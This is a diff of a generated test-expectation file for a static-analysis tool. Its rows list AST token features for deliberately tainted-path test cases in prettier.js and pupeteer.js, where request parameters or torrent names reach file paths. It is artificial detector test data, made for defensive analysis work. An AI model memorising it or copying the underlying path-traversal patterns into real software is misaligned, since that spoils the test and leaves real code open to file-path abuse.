autogenerated/TaintedPath/prettier.js:8:50:8:56 | options | receiverName | prettier | +| autogenerated/TaintedPath/prettier.js:11:5:11:12 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:5:11:12 | prettier | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:5:11:12 | prettier | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:5:11:12 | prettier | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:5:11:12 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:5:11:26 | prettie ... eConfig | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:5:11:26 | prettie ... eConfig | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:5:11:26 | prettie ... eConfig | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:5:11:26 | prettie ... eConfig | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:5:11:26 | prettie ... eConfig | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | exceptional return of prettie ... ig: p}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | exceptional return of prettie ... ig: p}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | exceptional return of prettie ... ig: p}) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | exceptional return of prettie ... ig: p}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | exceptional return of prettie ... ig: p}) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | prettie ... ig: p}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | prettie ... ig: p}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | prettie ... ig: p}) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | prettie ... ig: p}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:5:11:46 | prettie ... ig: p}) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:5:11:51 | prettie ... }).then | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:5:11:51 | prettie ... }).then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:5:11:51 | prettie ... }).then | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:5:11:51 | prettie ... }).then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:5:11:51 | prettie ... }).then | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | exceptional return of prettie ... \\n }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | exceptional return of prettie ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | exceptional return of prettie ... \\n }) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | exceptional return of prettie ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | exceptional return of prettie ... \\n }) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | prettie ... \\n }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | prettie ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | prettie ... \\n }) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | prettie ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:5:13:6 | prettie ... \\n }) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:14:11:26 | resolveConfig | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:14:11:26 | resolveConfig | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:14:11:26 | resolveConfig | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:14:11:26 | resolveConfig | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:14:11:26 | resolveConfig | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:11:28:11:32 | "foo" | CalleeFlexibleAccessPath | prettier.resolveConfig | | autogenerated/TaintedPath/prettier.js:11:28:11:32 | "foo" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:11:28:11:32 | "foo" | calleeImports | prettier | @@ -10360,6 +82475,21 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:11:35:11:45 | {config: p} | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/prettier.js:11:35:11:45 | {config: p} | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:11:35:11:45 | {config: p} | receiverName | prettier | +| autogenerated/TaintedPath/prettier.js:11:36:11:41 | config | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:36:11:41 | config | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:36:11:41 | config | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:36:11:41 | config | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:36:11:41 | config | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:36:11:44 | config: p | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:11:44:11:44 | p | CalleeFlexibleAccessPath | prettier.resolveConfig | | autogenerated/TaintedPath/prettier.js:11:44:11:44 | p | InputAccessPathFromCallee | 1.config | | autogenerated/TaintedPath/prettier.js:11:44:11:44 | p | InputArgumentIndex | 1 | @@ -10370,6 +82500,21 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:11:44:11:44 | p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | | autogenerated/TaintedPath/prettier.js:11:44:11:44 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/prettier.js:11:44:11:44 | p | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:48:11:51 | then | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:48:11:51 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:11:48:11:51 | then | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:48:11:51 | then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:48:11:51 | then | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:53:11:52 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:53:11:52 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:53:11:52 | prettier | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:53:11:52 | prettier | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:53:11:52 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | 'arguments' object of anonymous function | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:11:53:13:5 | (option ... ;\\n } | CalleeFlexibleAccessPath | prettier.resolveConfig().then | | autogenerated/TaintedPath/prettier.js:11:53:13:5 | (option ... ;\\n } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:11:53:13:5 | (option ... ;\\n } | calleeImports | prettier | @@ -10378,6 +82523,61 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:11:53:13:5 | (option ... ;\\n } | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | | autogenerated/TaintedPath/prettier.js:11:53:13:5 | (option ... ;\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/prettier.js:11:53:13:5 | (option ... ;\\n } | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | exceptional return of anonymous function | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | return of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:53:13:5 | return of anonymous function | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:11:54:11:60 | options | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:12:15:12:23 | formatted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:12:15:12:23 | formatted | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:12:15:12:23 | formatted | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:12:15:12:23 | formatted | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:12:15:12:23 | formatted | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:12:15:12:57 | formatt ... ptions) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:12:15:12:57 | formatt ... ptions) | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:12:15:12:57 | formatt ... ptions) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:12:15:12:57 | formatt ... ptions) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:12:15:12:57 | formatt ... ptions) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:12:27:12:34 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:12:27:12:34 | prettier | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:12:27:12:34 | prettier | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:12:27:12:34 | prettier | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:12:27:12:34 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:12:27:12:41 | prettier.format | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:12:27:12:41 | prettier.format | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:12:27:12:41 | prettier.format | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:12:27:12:41 | prettier.format | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:12:27:12:41 | prettier.format | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | exceptional return of prettie ... ptions) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | exceptional return of prettie ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | exceptional return of prettie ... ptions) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | exceptional return of prettie ... ptions) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | exceptional return of prettie ... ptions) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | prettie ... ptions) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | prettie ... ptions) | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | prettie ... ptions) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | prettie ... ptions) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:12:27:12:57 | prettie ... ptions) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:12:36:12:41 | format | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:12:36:12:41 | format | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:12:36:12:41 | format | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:12:36:12:41 | format | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:12:36:12:41 | format | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:12:43:12:47 | "bar" | CalleeFlexibleAccessPath | prettier.format | | autogenerated/TaintedPath/prettier.js:12:43:12:47 | "bar" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:12:43:12:47 | "bar" | calleeImports | prettier | @@ -10396,18 +82596,157 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:12:50:12:56 | options | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/prettier.js:12:50:12:56 | options | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:12:50:12:56 | options | receiverName | prettier | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:0 | this | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | parseTorrent | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | puppeteer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | puppeteer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | puppeteer | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:1:1:1 | require | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:15 | puppeteer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:15 | puppeteer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:15 | puppeteer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:15 | puppeteer | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:38 | puppete ... eteer') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:38 | puppete ... eteer') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:38 | puppete ... eteer') | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:38 | puppeteer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:38 | puppeteer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:7:1:38 | puppeteer | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:25 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:25 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:25 | require | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:38 | exceptional return of require('puppeteer') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:38 | exceptional return of require('puppeteer') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:38 | exceptional return of require('puppeteer') | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:38 | require('puppeteer') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:38 | require('puppeteer') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:1:19:1:38 | require('puppeteer') | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:1:27:1:37 | 'puppeteer' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/pupeteer.js:1:27:1:37 | 'puppeteer' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/pupeteer.js:1:27:1:37 | 'puppeteer' | calleeImports | | | autogenerated/TaintedPath/pupeteer.js:1:27:1:37 | 'puppeteer' | contextFunctionInterfaces | | | autogenerated/TaintedPath/pupeteer.js:1:27:1:37 | 'puppeteer' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/pupeteer.js:1:27:1:37 | 'puppeteer' | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:18 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:18 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:18 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:18 | parseTorrent | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:45 | parseTo ... rrent') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:45 | parseTo ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:45 | parseTo ... rrent') | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:45 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:45 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:2:7:2:45 | parseTorrent | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:28 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:28 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:28 | require | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:45 | exceptional return of require ... rrent') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:45 | exceptional return of require ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:45 | exceptional return of require ... rrent') | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:45 | require ... rrent') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:45 | require ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:2:22:2:45 | require ... rrent') | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:2:30:2:44 | 'parse-torrent' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/pupeteer.js:2:30:2:44 | 'parse-torrent' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/pupeteer.js:2:30:2:44 | 'parse-torrent' | calleeImports | | | autogenerated/TaintedPath/pupeteer.js:2:30:2:44 | 'parse-torrent' | contextFunctionInterfaces | | | autogenerated/TaintedPath/pupeteer.js:2:30:2:44 | 'parse-torrent' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/pupeteer.js:2:30:2:44 | 'parse-torrent' | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:2 | (async ... e();\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:2 | (async ... e();\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:2 | (async ... e();\\n}) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:4 | (async ... );\\n})() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:4 | (async ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:4 | (async ... );\\n})() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:4 | exceptional return of (async ... );\\n})() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:4 | exceptional return of (async ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:4:1:17:4 | exceptional return of (async ... );\\n})() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | parseTorrent | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | parseTorrent | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | parseTorrent | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | puppeteer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | puppeteer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | puppeteer | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | puppeteer | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:4:2:4:1 | puppeteer | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | 'arguments' object of anonymous function | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | 'arguments' object of anonymous function | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | async ( ... se();\\n} | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | async ( ... se();\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | async ( ... se();\\n} | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | exceptional return of anonymous function | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | exceptional return of anonymous function | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| 